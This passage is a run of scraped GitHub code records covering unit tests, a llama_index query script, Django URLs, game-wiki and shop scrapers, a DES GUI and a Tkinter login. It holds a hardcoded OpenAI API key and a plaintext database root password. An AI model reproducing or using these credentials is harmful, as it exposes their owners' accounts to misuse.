storage.create_ids(names[0], tweets)\n timelineindex = TimelineIndex.find_by_name(names[0], storage.session())\n self.assertEqual(timelineindex.since_id, expectation_ids[\"since_id\"])\n self.assertEqual(timelineindex.max_id, expectation_ids[\"max_id\"])\n\n def test_update_ids(self):\n storage = TimelineIndexStorage(\"sqlite:///:memory:\")\n names = [\"timeline\"]\n ids = test_ids(names, 2)\n expectation_ids = {\"since_id\": 100, \"max_id\": 2000}\n session = storage.session()\n insert_test_db(names, ids, session)\n tweets = Mock(since_id=expectation_ids[\"since_id\"],\n max_id=expectation_ids[\"max_id\"])\n storage.update_ids(names[0], tweets)\n timelineindex = TimelineIndex.find_by_name(names[0], session)\n self.assertEqual(timelineindex.since_id, expectation_ids[\"since_id\"])\n self.assertEqual(timelineindex.max_id, expectation_ids[\"max_id\"])\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"A03ki/uecbbs","sub_path":"tests/test_storages.py","file_name":"test_storages.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"99161147","text":"import os\r\nimport tiktoken\r\nimport weaviate\r\nfrom llama_index import ServiceContext, LLMPredictor, OpenAIEmbedding, PromptHelper\r\nfrom llama_index.llms import OpenAI\r\nfrom llama_index.text_splitter import TokenTextSplitter\r\nfrom llama_index.node_parser import SimpleNodeParser\r\nfrom llama_index import VectorStoreIndex, SimpleDirectoryReader\r\nfrom llama_index import set_global_service_context\r\n\r\nos.environ['OPENAI_API_KEY'] = \"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\"\r\n\r\ndocuments = SimpleDirectoryReader(input_dir='../GenChef/').load_data()\r\n\r\ntext_splitter = TokenTextSplitter(\r\n separator=\" \",\r\n chunk_size=1024,\r\n chunk_overlap=20,\r\n backup_separators=[\"\\n\"],\r\n tokenizer=tiktoken.encoding_for_model(\"gpt-3.5-turbo\").encode\r\n)\r\n\r\nnode_parser = SimpleNodeParser.from_defaults(\r\n text_splitter = TokenTextSplitter()\r\n)\r\n\r\nllm = OpenAI(model='gpt-3.5-turbo', temperature=0, max_tokens=256)\r\nembed_model = OpenAIEmbedding()\r\n\r\nprompt_helper = PromptHelper(\r\n context_window=4096, \r\n num_output=256, \r\n chunk_overlap_ratio=0.1, \r\n chunk_size_limit=None\r\n)\r\n\r\nservice_context = ServiceContext.from_defaults(\r\n llm=llm,\r\n embed_model=embed_model,\r\n node_parser=node_parser,\r\n prompt_helper=prompt_helper\r\n)\r\n\r\nindex = VectorStoreIndex.from_documents(\r\n documents, \r\n service_context = service_context\r\n)\r\n\r\nquery_engine = index.as_query_engine(service_context=service_context)\r\nresponse = query_engine.query(\"What does feature extraction take place?\")\r\nprint(response)","repo_name":"T3CH3Y/GenChef","sub_path":"raketest.py","file_name":"raketest.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"38768392657","text":"from functools import cached_property\n\nfrom django.http import HttpRequest\n\nfrom sentry.middleware.proxy import SetRemoteAddrFromForwardedFor\nfrom sentry.testutils import TestCase\n\n\nclass SetRemoteAddrFromForwardedForTestCase(TestCase):\n middleware = cached_property(SetRemoteAddrFromForwardedFor)\n\n def test_ipv4(self):\n request = HttpRequest()\n request.META[\"HTTP_X_FORWARDED_FOR\"] = \"8.8.8.8:80,8.8.4.4\"\n self.middleware.process_request(request)\n assert request.META[\"REMOTE_ADDR\"] == \"8.8.8.8\"\n\n def test_ipv4_whitespace(self):\n request = HttpRequest()\n request.META[\"HTTP_X_FORWARDED_FOR\"] = \"8.8.8.8:80 \"\n self.middleware.process_request(request)\n assert request.META[\"REMOTE_ADDR\"] == \"8.8.8.8\"\n\n def test_ipv6(self):\n request = HttpRequest()\n request.META[\"HTTP_X_FORWARDED_FOR\"] = \"2001:4860:4860::8888,2001:4860:4860::8844\"\n self.middleware.process_request(request)\n assert request.META[\"REMOTE_ADDR\"] == \"2001:4860:4860::8888\"\n","repo_name":"adityamillind98/sentry","sub_path":"tests/sentry/middleware/test_proxy.py","file_name":"test_proxy.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"74305596455","text":"import requests\nimport lxml.html as lh\nimport json\nimport os\n\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36\"\n}\n\n\ndoubleNames = {\n \"Bank Heist\": [\"Bank Heist: Deposit\", \"Bank Heist: Cash\", \"Bank Heist: Gold\", \"Bank Heist: Random\"],\n \"Transport\": [\n \"Transport: Crossroads\",\n \"Transport: Downtown\",\n \"Transport: Harbor\",\n \"Transport: Park\",\n \"Transport: Underpass\",\n ],\n}\n\nclassics = [\n \"Diamond Heist\",\n \"First World Bank\",\n \"Green Bridge\",\n \"Heat Street\",\n \"No Mercy\",\n \"Panic Room\",\n \"Slaughterhouse\",\n \"Counterfeit\",\n \"Undercover\",\n]\n\n\ndef HandlePayday2Heists():\n print(\"Parsing Payday 2 Heists...\")\n\n page = requests.get(\"https://payday.fandom.com/wiki/Category:PAYDAY_2_heists#Heists\", headers=headers)\n doc = lh.fromstring(page.content)\n scrapedHeists = {}\n tableContent = doc.xpath(\"//table[@class='navbox']\")[0][0].text_content().replace(\"\\n\\n\", \"===SEP===\\n\")\n\n for x in tableContent.split(\"===SEP===\"):\n x = x.replace(\"\\n\", \"\")\n if \"•\" not in x:\n continue\n x = (\n x.replace(\"Hector: Firestarter\", \"• Firestarter\")\n .replace(\"The Continental: Brooklyn 10-10\", \" • Brooklyn 10-10\")\n .replace(\"NightmareBasic: Flash Drive\", \"Nightmare • Flash Drive\")\n .replace(\"Other: Safe House Raid\", \" • Safe House Raid\")\n .replace(\"Watchdogs Jimmy:\", \"Watchdogs •\")\n .replace(\"Event: Cursed\", \" • Cursed\")\n .replace(\"The Butcher: \", \" \")\n )\n\n for heist in x.split(\"•\"):\n heist = heist.strip().rstrip()\n if heist in classics:\n heist += \" (Payday 2)\"\n print(f\"Requesting heist: {heist}\")\n heistPage = requests.get(f\"https://payday.fandom.com/wiki/{heist}\", headers=headers)\n heistDoc = lh.fromstring(heistPage.content)\n # div -> table -> tbody\n heistTable = heistDoc.xpath(\"//div[@class='mw-parser-output']\")[0]\n\n for foo in heistTable:\n if (\n foo.get(\"style\")\n == \"background-color:#131313; width:309px; float:right; clear:right; margin-left:.5em; font-size:smaller; line-height:1.5em; color:white\"\n ):\n heistTable = foo[0]\n break\n\n contractor = heistTable[3][1].text_content().replace(\"\\n\", \"\") # Who gives the heist out\n length = int(heistTable[4][1].text_content().replace(\"\\n\", \"\")) # Length of heist in days\n loudOrStealth = heistTable[5][1].text_content().replace(\"\\n\", \"\").split(\" / \") # Loud, Stealth\n print(f'Found heist \"{heist}\" from {contractor} of length {length} day(s) ({loudOrStealth})')\n\n loudable = loudOrStealth[0] == \"✔\"\n stealthable = loudOrStealth[1] == \"✔\"\n\n if heist in doubleNames:\n for doubleName in doubleNames[heist]:\n scrapedHeists.update(\n {\n doubleName: {\n \"contractor\": contractor,\n \"days\": length,\n \"stealthable\": stealthable,\n \"loudable\": loudable,\n }\n }\n )\n else:\n scrapedHeists.update(\n {\n heist: {\n \"contractor\": contractor,\n \"days\": length,\n \"stealthable\": stealthable,\n \"loudable\": loudable,\n }\n }\n )\n return scrapedHeists\n\n\ndef HandlePayday2Gear():\n print(\"Parsing Payday 2 Weapons...\")\n\n # Melee needs to be handled differently.\n typeToLink = {\n \"Primary\": \"https://payday.fandom.com/wiki/Category:Primary_weapons_(Payday_2)\",\n \"Secondary\": \"https://payday.fandom.com/wiki/Category:Secondary_weapons_(Payday_2)\",\n \"Throwable\": \"https://payday.fandom.com/wiki/Category:Throwable_weapons\",\n }\n weaponTypes = {\"Primary\": [], \"Secondary\": [], \"Throwable\": [], \"Melee\": []}\n\n for wepType in typeToLink:\n page = requests.get(typeToLink[wepType], headers=headers)\n if not page:\n return\n doc = lh.fromstring(page.content)\n for link in doc.xpath(\"//a[@class='category-page__member-link']\"):\n wepName = link.text_content().replace(\"\\n\", \"\").replace(\" (Payday 2)\", \"\").replace(\"\\u2019\", \"'\")\n if \".png\" in wepName or \"Category:\" in wepName or \"File:\" in wepName:\n continue\n print(f\"Parsing gun: {wepName}\")\n weaponTypes[wepType] += [wepName]\n\n # Now to handle melee\n page = requests.get(\"https://payday.fandom.com/wiki/Category:Melee\", headers=headers)\n if not page:\n return\n doc = lh.fromstring(page.content)\n trElements = doc.xpath(\"//tr\")[5:]\n for tableRow in trElements:\n meleeName = tableRow[0].text_content().replace(\"\\n\", \"\").replace(\"\\u00B4\", \"'\")\n\n print(f\"Parsing melee weapon: {meleeName}\")\n weaponTypes[\"Melee\"] += [meleeName]\n return weaponTypes\n\n\n# Hardcoded lol\nheists = {\n \"__comment1\": \"All data scraped from: https://payday.fandom.com/wiki/Category:PAYDAY_2_heists#Heists and https://payday.fandom.com/wiki/PAYDAY:_The_Heist#Heists\",\n \"Payday2\": {},\n \"Payday1\": {\n \"First World Bank\": {\"contractor\": \"Bain\", \"days\": 1, \"stealthable\": True, \"loudable\": True},\n \"Heat Street\": {\"contractor\": \"Bain\", \"days\": 1, \"stealthable\": False, \"loudable\": True},\n \"Panic Room\": {\"contractor\": \"Bain\", \"days\": 1, \"stealthable\": False, \"loudable\": True},\n \"Green Bridge\": {\"contractor\": \"Bain\", \"days\": 1, \"stealthable\": False, \"loudable\": True},\n \"Diamond Heist\": {\"contractor\": \"Bain\", \"days\": 1, \"stealthable\": True, \"loudable\": True},\n \"Slaughterhouse\": {\"contractor\": \"Bain\", \"days\": 1, \"stealthable\": False, \"loudable\": True},\n \"Undercover\": {\"contractor\": \"Bain\", \"days\": 1, \"stealthable\": False, \"loudable\": True},\n \"Counterfeit\": {\"contractor\": \"Bain\", \"days\": 1, \"stealthable\": False, \"loudable\": True},\n \"No Mercy\": {\"contractor\": \"Bain\", \"days\": 1, \"stealthable\": False, \"loudable\": True},\n },\n}\n\nheists[\"Payday2\"] = HandlePayday2Heists()\n\nwith open(\"../js/data/heists.json\", \"w\") as outfile:\n json.dump(heists, outfile, indent=4)\n\n# Hardcoded cause its not like Payday 1 is getting updated lol\ngear = {\n \"Payday2\": {},\n \"Payday1\": {\n \"Primary\": [\n \"AMCAR-4\",\n \"Reinbeck\",\n \"M308\",\n \"Brenner 21\",\n \"AK-47\",\n \"Mark 11\",\n \"Locomotive 12G\",\n \"Compact-5\",\n \"GL40\",\n ],\n \"Secondary\": [\"B9-S\", \"Bronco .44\", \"Crosskill .45\", \"STRYK\"],\n \"Melee\": [\"Knife\"],\n },\n}\ngear[\"Payday2\"] = HandlePayday2Gear()\n\nwith open(\"../js/data/gear.json\", \"w\") as outfile:\n json.dump(gear, outfile, indent=4)\n","repo_name":"FromDarkHell/PaydayRoulette","sub_path":"tools/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":7248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18369821529","text":"n = int(input())\nA = [int(input()) for _ in range(n)]\n\nB = []\nimport bisect\nfor i, a in enumerate(A):\n if len(B) == 0:\n B.append(-a)\n else:\n j = bisect.bisect_right(B, -a)\n #print(j)\n if j == len(B):\n B.append(-a)\n elif j == 0:\n B[0] = -a\n else:\n B[j] = -a\n #print(B)\n#print(B)\nprint(len(B))\n","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p02973/s693253730.py","file_name":"s693253730.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"21183690646","text":"\"\"\"funread_backend URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n #path('accounts/', include('AuthApp.urls')),\n path('users/',include('Users.urls')),\n path('books/',include('Books.urls')),\n path('pages/',include('Pages.urls')),\n path('widget/',include('Widget.urls')),\n path('file/',include('Files.urls')),\n path('folder/',include('folder.urls')),\n path('Tags/',include('Tags.urls')),\n path('email/', include('Mailer.urls')),\n path('roles/', include('Roles.urls')),\n path('userroles/',include('Userroles.urls')),\n path('author/', include('Author.urls')),\n path('sharedbooks/', include('Sharedbooks.urls')),\n path('grades/', include('Grades.urls')),\n path('institute/', include('Institute.urls')),\n path('studentsgroups/', include('StudentsGroups.urls')),\n path('tagsperpage/', include('TagsPerPage.urls')),\n path('classes/', include('Classes.urls')),\n path('classeslog/', include('ClassesLog.urls')),\n path('booksPerClasses/', include('BooksPerClasses.urls')),\n path('groupsPerClasses/', include('GroupsPerClasses.urls')),\n path('Media/', include('Media.urls')),\n path('join/', include('Joins.urls')),\n path('GroupsCreate/', include('GroupsCreate.urls')),\n path('Options/', include('Options.urls')),\n path('bookdilemma/',include('BooksDilemma.urls')),\n path('translate/',include('TranslateApp.urls')),\n path('Subtitled/',include('Subtitled.urls'))\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"Funread/funread","sub_path":"funread_backend/funread_backend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"73488715496","text":"def unique_words_count(arr):\n\tunique_words = len(arr)\n\t\n\trepeated_words = {}\n\n\tfor word in arr:\n\t\tcount = 1\n\t\ti = arr.index(word)\n\t\tfor w in arr[i+1:]:\n\t\t\tif word == w:\n\t\t\t\tcount+=1\n\n\t\tisPresent = False\n\n\t\tfor w2 in repeated_words:\n\t\t\tif word == w2:\n\t\t\t\tisPresent = True\n\n\t\tif isPresent == False:\n\t\t\trepeated_words[word] = count\n\n\tunique_words = len(repeated_words)\n\n\treturn unique_words\n\n","repo_name":"tdhris/HackBulgaria","sub_path":"Week0/unique_words_count/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"5786189749","text":"import sys\nimport os\nimport numpy as np\n\n\ndef write_predictions(fname, arr):\n np.savetxt(fname, arr, fmt=\"%d\", delimiter=\"\\n\")\n\n\ndef run(x_train, y_train, x_test, batch_size, hidden_layer_list, activation):\n num_classes = 5\n\n # Cool Stuff\n \n predictions = [1 ,0, 1]\n return predictions\n\n\ndef main():\n x_train = sys.argv[1]\n y_train = sys.argv[2]\n x_test = sys.argv[3]\n output_file = sys.argv[4]\n batch_size = int(sys.argv[5])\n hidden_layer_list = [int(i) for i in sys.argv[6].split()]\n activation = sys.argv[7]\n\n output = run(x_train, y_train, x_test, batch_size, hidden_layer_list, activation)\n write_predictions(output_file, output)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"chiragmohapatra/COL774","sub_path":"assignment3/2016CSZ8119/neural_network.py","file_name":"neural_network.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"8726849328","text":"from ui.src.crack_window import CrackWindow\nfrom ui.src.encryption_window import EncryptionWindow\nfrom ui.src.window_utils import error_warning\nfrom encryption.encrypt import Encryptor\nfrom decryption.decrypt import CrackThread\n\n\nclass WindowController:\n def __init__(self) -> None:\n self.encryptor = Encryptor()\n self.crack_win = CrackWindow()\n self.encryption_win = EncryptionWindow()\n self.crack_thread = CrackThread()\n \n self.crack_win.hide()\n self.encryption_win.show()\n\n def init(self):\n self.crack_win.init()\n self.encryption_win.init()\n self.encryptor.init()\n\n self.crack_win.change_window_signal.connect(self.show_encryption_window)\n self.encryption_win.change_window_signal.connect(self.show_crack_window)\n\n self.encryption_win.generate_signal.connect(self.generate_text)\n self.crack_win.crack_signal.connect(self.crack)\n\n def show_encryption_window(self, mode: str) -> None:\n self.crack_win.hide()\n self.encryption_win.window_mode_init(mode=mode)\n self.encryption_win.show()\n\n def show_crack_window(self):\n self.encryption_win.hide()\n self.crack_win.show()\n\n def generate_text(self, data_dict: dict):\n try:\n if data_dict[\"key\"] != \"\":\n self.encryptor.key_init([int(x) for x in data_dict[\"key\"]])\n\n if data_dict[\"mode\"] == EncryptionWindow.ENCRYPT:\n if data_dict[\"codeset\"] == \"binary\":\n text = self.encryptor.encrypt_binary([int(x) for x in data_dict[\"text\"]], is_decrypt=False)\n text = self.to_string(text)\n else:\n text = self.encryptor.encrypt_string(data_dict[\"text\"], is_decrypt=False)\n else:\n if data_dict[\"codeset\"] == \"binary\":\n text = self.encryptor.encrypt_binary([int(x) for x in data_dict[\"text\"]], is_decrypt=True)\n text = self.to_string(text)\n else:\n text = self.encryptor.encrypt_string(data_dict[\"text\"], is_decrypt=True)\n\n text = ''.join(text)\n if data_dict[\"key\"] == \"\":\n text = 'encryption text: \\n' + ''.join(map(str, text)) + '\\n\\n' + 'encryption key: \\n' + ''.join(map(str, self.encryptor.get_key()))\n self.encryption_win.show_result(text)\n except Exception as e:\n error_warning(\"Some error happened, please enter again or restart the program ! \")\n\n def crack(self, data_dict: dict):\n try:\n print(data_dict[\"pn_text\"])\n print(data_dict[\"en_text\"])\n print(data_dict[\"codeset\"])\n if data_dict[\"codeset\"] == \"unicode\":\n res = \"\"\n else:\n self.crack_thread.solve(data_dict[\"pn_text\"], data_dict[\"en_text\"])\n res = \"Possible keys are:\\n\"\n for key in self.crack_thread.get_keys():\n res += key\n res += '\\n'\n res = res + \"\\nSpent time: \" + '{:.6}s'.format(str(self.crack_thread.get_time())) + '\\n'\n\n self.crack_win.show_result(res)\n except Exception as e:\n error_warning(\"Some error happened, please enter again or restart the program ! \")\n\n def to_string(self, text):\n res = []\n for each in text:\n for x in each:\n res.append(str(x))\n\n return res\n ","repo_name":"Jiewoe/Simple_DES","sub_path":"ui/src/window_controller.py","file_name":"window_controller.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"9286396225","text":"import tensorflow as tf\nfrom Diplomovka.Classifiers.K_F_MNIST.K_F_MNIST import K_F_MNIST\nfrom Diplomovka.Classifiers.Classifier_Trainer import Classifier_Trainer as Trainer\nimport Diplomovka.Classifiers.Classifier_utils as utils\n\n\n# Skript natrénuje architektúru K_F_MNIST na datasete MNIST\n(train_images, train_labels), (test_images, test_labels) = tf.keras.datasets.mnist.load_data()\n\ndef normalize(imgs):\n\treturn (imgs - 127.5) / 127.5\n# Upravi tenzor na tvar [POCET,28,28,1]\ntrain_images = train_images.reshape(train_images.shape[0], 28, 28, 1).astype('float32')\n# Normalizuje hodnoty pixelov do -1;1\ntrain_images = (train_images - 127.5) / 127.5\n\ntest_images = test_images.reshape(test_images.shape[0], 28, 28, 1).astype('float32')\ntest_images = (test_images - 127.5) / 127.5\n\ndef train_gen():\n\tfor img,label in zip(train_images,train_labels):\n\t\tlabel = tf.one_hot(label, 10)\n\t\tyield img,label\n\ndef test_gen():\n\tfor img,label in zip(test_images,test_labels):\n\t\tlabel = tf.one_hot(label,10)\n\n\t\tyield img,label\n\nbatch_size = 32\n\ntrain_dataset = tf.data.Dataset.from_generator(train_gen,(tf.float32,tf.int64)).batch(batch_size)\ntest_dataset = tf.data.Dataset.from_generator(test_gen,(tf.float32,tf.int64)).batch(batch_size)\n\nclassifier = K_F_MNIST([28,28,1])\ntrainer = Trainer(train_dataset,test_dataset,classifier,batch_size)\ntrainer.start(\"pretrained_model/MNIST/\",save_name=\"classifier\",epochs=8,log_path='training_log/MNIST/')\n\n# classifier.loadWeights(\"pretrained_model/MNIST/classifier\")\n# acc = utils.accuracy_on_dataset(classifier,test_dataset)\n# print(acc)\n","repo_name":"Flashikez/Diplomova_Praca","sub_path":"Diplomovka/Classifiers/K_F_MNIST/train_MNIST.py","file_name":"train_MNIST.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"10299544380","text":"from tkinter import * \nfrom tkinter import font\nimport cv2, os\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import messagebox\nfrom PIL import Image, ImageTk\nimport mysql.connector\nfrom register import Register\nfrom Class import *\n\n\nclass Login_Windows:\n def __init__(self,root):\n self.root = root\n self.root.geometry(\"800x500+0+0\")\n self.root.title(\"Login System\")\n self.root.option_add(\"*tearOff\", False)\n\n img3 = Image.open(r\"assets/img/loginwd.jpg\")\n img3 = img3.resize((800,500),Image.ANTIALIAS)\n self.photoimg3 = ImageTk.PhotoImage(img3)\n\n bg_img = ttk.Label(self.root, image = self.photoimg3)\n bg_img.place(x = 0,y = 0, width = 800, height = 500)\n\n main_frame = Frame(bg_img, bg = \"#03153B\")\n main_frame.place(x = 440, y = 0, width = 445, height = 500)\n \n img4 = Image.open(r\"assets/img/User.png\")\n img4 = img4.resize((80,80),Image.ANTIALIAS)\n self.photoimg4 = ImageTk.PhotoImage(img4)\n\n lbl_img4 = Label(self.root, image = self.photoimg4, bg = \"#03153B\")\n lbl_img4.place(x = 580,y = 20, width = 75, height = 75)\n \n login = Label(main_frame, text = \"Đăng nhập\", font = (\"Google Sans\",20,\"bold\"),fg = \"white\", bg = \"#03153B\")\n login.place(x = 100, y = 70, width = 150, height = 100)\n\n#Label\n\n username = lbl = Label(main_frame, text = \"Tên đăng nhập \", font = (\"Google Sans\",9,\"bold\"),fg = \"#4F6998\", bg = \"#03153B\" )\n username.place(x = 55, y = 180, width = 120, height = 20)\n\n self.txtUser = ttk.Entry(main_frame, font = (\"Google Sans\",11,\"bold\"), width = 17)\n self.txtUser.place(x = 70, y = 200, width = 250, height = 35)\n\n password = lbl = Label(main_frame, text = \"Mật khẩu \", font = (\"Google Sans\",9,\"bold\"),fg = \"#4F6998\", bg = \"#03153B\" )\n password.place(x = 40, y = 250, width = 120, height = 20)\n\n self.txtPwd = ttk.Entry(main_frame, font = (\"Google Sans\",11,\"bold\"), width = 17)\n self.txtPwd.place(x = 70, y = 270, width = 250, height = 35)\n\n\n#Icon images\n\n img5 = Image.open(r\"assets/img/uslg.png\")\n img5 = img5.resize((33,33),Image.ANTIALIAS)\n self.photoimg5 = ImageTk.PhotoImage(img5)\n\n uslg_img =Label(main_frame, image = self.photoimg5, bg = \"#03153B\")\n uslg_img.place(x = 33,y = 200, width = 33, height = 33)\n\n img6 = Image.open(r\"assets/img/pwd.png\")\n img6 = img6.resize((25,30),Image.ANTIALIAS)\n self.photoimg6 = ImageTk.PhotoImage(img6)\n\n pwd_img =Label(main_frame, image = self.photoimg6, bg = \"#03153B\")\n pwd_img.place(x = 33,y = 270, width = 33, height = 33)\n\n#Button\n loginbtn = ttk.Button(main_frame, command = self.login, text = \"Đăng nhập\", style=\"ToggleButton\")\n loginbtn.place(x = 45, y = 350, width = 125, height = 33)\n\n regbtn = ttk.Button(main_frame, command = self.register, text = \"Đăng ký\", style=\"ToggleButton\")\n regbtn.place(x = 200, y = 350, width = 125, height = 33)\n\n fgpwdbtn = Button(main_frame, text = \"Quên mật kh��u\",borderwidth= 0, font = (\"Google Sans\",9,\"italic\"),fg = \"#4F6998\", bg = \"#03153B\", activeforeground=\"#52A1EC\", activebackground = \"#03153B\")\n fgpwdbtn.place(x = 55, y = 400, width = 260, height = 33)\n\n\n def login(self):\n if self.txtUser.get()== \"\" or self.txtPwd.get()==\"\":\n messagebox.showerror(\"Error\",\"Không được để trống Tên đăng nhập hoặc Mật khẩu!\") \n else:\n try:\n conn = mysql.connector.connect(user='root', password='250301',\n host='localhost',\n database='face_recognition')\n print('Connect successfully') \n cursor = conn.cursor()\n cursor .execute(\"select * from user_data where user = %s and pwd = %s\", (\n self.txtUser.get(),\n self.txtPwd.get()\n ))\n rows = cursor.fetchone()\n if rows == None:\n messagebox.showerror(\"Error\",\"Tên đăng nhập hoặc mật khẩu không đúng!\") \n else:\n messagebox.showinfo(\"Success\", \"Đăng nhập thành công!\")\n self.new_window = Toplevel(self.root)\n self.obj = Face_Recognition_System(self.new_window)\n conn.commit()\n conn.close()\n except Exception as es:\n messagebox.showerror(\"Error\", f\"Due To:{str(es)}\", parent = self.root)\n \n def register(self):\n self.new_window = Toplevel(self.root)\n self.obj = Register(self.new_window)\n\n\nif __name__ == \"__main__\":\n root =Tk()\n root.option_add(\"*tearOff\", False)\n\n # Make the app responsive\n root.columnconfigure(index=0, weight=1)\n root.columnconfigure(index=1, weight=1)\n root.columnconfigure(index=2, weight=1)\n root.rowconfigure(index=0, weight=1)\n root.rowconfigure(index=1, weight=1)\n root.rowconfigure(index=2, weight=1)\n\n # Create a style\n style = ttk.Style(root)\n\n # Import the tcl file\n root.tk.call(\"source\", \"Azure-ttk-theme/azure-dark.tcl\")\n\n # Set the theme with the theme_use method\n style.theme_use(\"azure-dark\")\n obj = Login_Windows(root)\n root.mainloop()","repo_name":"TanIT2503/DevProject","sub_path":"FaceTraining/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":5386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"74540807655","text":"import requests\nimport json\nfrom sql import mysql\n\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/91.0.4472.124 Safari/537.36 '\n }\n\n\ndef get_pageItem(url) -> list:\n html = requests.get(url, headers=headers).text\n html_dic : dict = json.loads(html)\n item = html_dic['listing']['items']\n return item\n\n\ndef main(db, table):\n conn = mysql.SQL(db, table)\n conn.enter_database()\n conn.enter_table()\n for pageNo in range(1, 76):\n url = f'https://www.bidorbuy.co.za/mobilejquery/jsp/category/CategoriesAJAXHandler.jsp?pageNo={pageNo}&category=HotSelling'\n items: list = get_pageItem(url)\n for item in items:\n name = item['name']\n if 'voucher' in name or 'Voucher' in name:\n continue\n name = name.replace('\\'', '')\n name = name.replace('\\\"', '')\n ID = str(item['id'])\n ID1 = ID + '--1'\n ID2 = ID + '--2'\n img = item['product_image_url']\n price = 'R' + item['unit_sale_price']\n conn.insertData(ID, img, name, price)\n conn.insertData(ID1, img, name, price)\n conn.insertData(ID2, img, name, price)\n print('Write success', ID)\n","repo_name":"shopshipshake/Shopshipshake","sub_path":"djangoWebCrawl/crawl/stage_1/bidorbuy.py","file_name":"bidorbuy.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"90"} +{"seq_id":"43752414050","text":"data_dtypes = {}\nmobility_dtypes = {\"location_name\": \"category\",\n \"street_address\": \"category\",\n \"city\": \"category\",\n \"region\": \"category\",\n \"poi_cbg\": \"category\",\n \"brands\": \"category\",\n \"date_range_start\": \"category\",\n \"date_range_end\": \"category\",\n \"year\": \"int16\",\n \"month\": \"int8\",\n \"day\": \"int8\"}\n\ncensus_dtypes = {\"census_block_group\": \"category\"}\n","repo_name":"angel-langdon/Project2021","sub_path":"src/PythonLib/lib/utils/download_data/data_dtypes.py","file_name":"data_dtypes.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"90"} +{"seq_id":"1250120682","text":"import re\nfrom datetime import datetime, timedelta\nimport dateparser\nimport scrapy\n\nfrom tpdb.BaseSceneScraper import BaseSceneScraper\n\n\nclass SiteFightingDollsSpider(BaseSceneScraper):\n name = 'FightingDolls'\n network = 'Fighting Dolls'\n\n start_urls = [\n 'https://www.trib-dolls.com',\n 'https://www.fighting-dolls.com',\n ]\n\n selector_map = {\n 'title': '//h1/text()',\n 'description': '//h3[contains(text(),\"Description\")]/following-sibling::p//text()',\n 'date': '//div[@class=\"categories\"]/text()',\n 'image': '//div[@id=\"sample\"]/img/@src',\n 'performers': '//div[@class=\"grid-x\"]/div/div/div/h3/a/text()',\n 'tags': '//div[@class=\"categories\"]/a/text()',\n 'external_id': r'.*\\/(.*?)\\/',\n 'trailer': '',\n 'pagination': ''\n }\n\n def get_scenes(self, response):\n scenes = response.xpath('//div[@class=\"card-image\"]/a/@href').getall()\n for scene in scenes:\n if re.search(self.get_selector_map('external_id'), scene):\n yield scrapy.Request(url=self.format_link(response, scene), callback=self.parse_scene)\n\n def get_site(self, response):\n if \"trib-dolls\" in response.url:\n return \"Trib Dolls\"\n return \"Fighting Dolls\"\n\n def get_parent(self, response):\n if \"trib-dolls\" in response.url:\n return \"Trib Dolls\"\n return \"Fighting Dolls\"\n\n def get_next_page_url(self, base, page):\n if \"fighting-dolls\" in base:\n pagination = '/all-fighting-dolls-videos/%s/'\n if \"trib-dolls\" in base:\n pagination = '/all-trib-dolls-videos/%s/'\n page = str(int(page) - 1)\n return self.format_url(base, pagination % page)\n\n def get_date(self, response):\n date = response.xpath('//div[@class=\"categories\"]/text()').getall()\n if date:\n date = \"\".join(date)\n date = re.search(r'(\\d+) day', date)\n if date:\n daysago = int(date.group(1))\n date = datetime.now() - timedelta(days=daysago)\n if date:\n return date.isoformat()\n return 